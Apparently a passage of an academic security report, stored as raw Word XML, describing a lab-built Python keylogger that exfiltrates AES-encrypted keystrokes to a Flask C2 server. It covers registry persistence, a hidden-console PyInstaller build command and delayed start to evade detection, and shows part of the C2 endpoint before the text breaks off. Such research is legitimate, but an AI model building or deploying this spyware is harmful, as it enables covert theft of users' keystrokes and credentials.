          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc194070986"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Keylogger-Based Malware with C2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F8717" w14:textId="6B624FCA" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This implementation simulates a modern keylogger that captures and exfiltrates user keystrokes in real time to a command-and-control (C2) server. It draws upon the architecture described in Mourya, Patil, and Srivaramangai (2024), who proposed a remote keystroke monitoring system using encrypted communication. Additional stealth and persistence features were added, reflecting the evasion tactics outlined by Bhardwaj and Goundar (2020).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748E504C" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The keylogger was built in Python and executed within a Windows 10 virtual machine. A Flask server was set up on a second virtual machine to receive logs from the victim system. This setup was fully sandboxed and configured to allow only internal host-only network traffic. The keylogger was compiled into an executable and hidden on the victim machine using startup registration to ensure persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6DF57" w14:textId="1DD0B1C5" w:rsidR="002926C7" w:rsidRPr="00F26183" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26183">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379E0A5A" w14:textId="47533E62" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim System:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows 10 (VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58CCA8" w14:textId="1F794264" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C2 Server:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu/Kali Linux (VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AB5C7" w14:textId="3CDBC240" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-only adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF535F" w14:textId="73AEBFE2" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 3, pynput, requests, Flask, PyInstaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F65D5CD" w14:textId="12043864" w:rsidR="002926C7" w:rsidRPr="00F26183" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26183">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Features Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F167509" w14:textId="59D3A094" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Real-time log transmission with timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7AB18" w14:textId="0AA17C84" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AES encryption for data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBB6B6" w14:textId="47283573" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Persistence via registry key (Windows startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B5B94" w14:textId="402B62AB" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Stealth: Hidden console window and delayed execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E057B1" w14:textId="5B661908" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Cross-platform testing with Flask as a lightweight C2 backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48678F22" w14:textId="26D776A6" w:rsidR="002926C7" w:rsidRPr="00AA2C6A" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2C6A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation </w:t>
      </w:r>
      <w:r w:rsidR="0096462E" w:rsidRPr="00AA2C6A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAF321" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>On the victim side, a Python script captures every keystroke using the pynput library. Each captured key is timestamped and encrypted using AES encryption before being sent via POST request to the Flask server. The script runs silently in the background and launches on every system boot by registering itself in the Windows registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F9D02" w14:textId="32EF9346" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Keylogger Client Logic (Python – Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A74345" w14:textId="7C6FB8FE" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Captures all keystrokes using pynput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCBBF7" w14:textId="01A53BA9" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Encrypts keystrokes using symmetric AES encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2C896" w14:textId="5452C43F" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Adds timestamps to each keystroke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60882F4C" w14:textId="7F9B58C5" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sends data to the C2 server at fixed intervals (e.g., every 10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764BD2E6" w14:textId="57CC8C1B" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Starts silently on reboot using a Windows registry entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9BB8B6" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The compiled version used --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>noconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode to run invisibly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CB379" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>noconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>onefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> keylogger_client.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B182E48" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A delay of 30 seconds was added at the start of the script to reduce detection risk immediately after login, mimicking delayed-start tactics used by real spyware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B43E0C" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C2 Server Logic (Python + Flask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E892FDF" w14:textId="16024336" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Receives POST requests at /log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD943E" w14:textId="40B50B32" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Decrypts and stores keystroke data with associated timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE089D" w14:textId="76F9E846" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Saves logs to a file for review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF91D19" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sample Server Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A416980" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="0002236F" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.route</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('/log', methods=['POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7959D9" w14:textId="77777777"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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>receive_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78A788" w14:textId="4FF786B0"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data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request.get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBFF41C" w14:textId="3853CC55" w:rsidR="002926C7" w:rsidRPr="0002236F" w:rsidRDefault="002926C7" w:rsidP="00327E8E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decrypted_text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = decrypt(data['keystroke'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>])  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AES decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0498A2" w14:textId="789B21F4"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with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"logs.txt", "a") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0BF27" w14:textId="797207BE" w:rsidR="00327E8E" w:rsidRPr="0002236F" w:rsidRDefault="002926C7" w:rsidP="00327E8E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
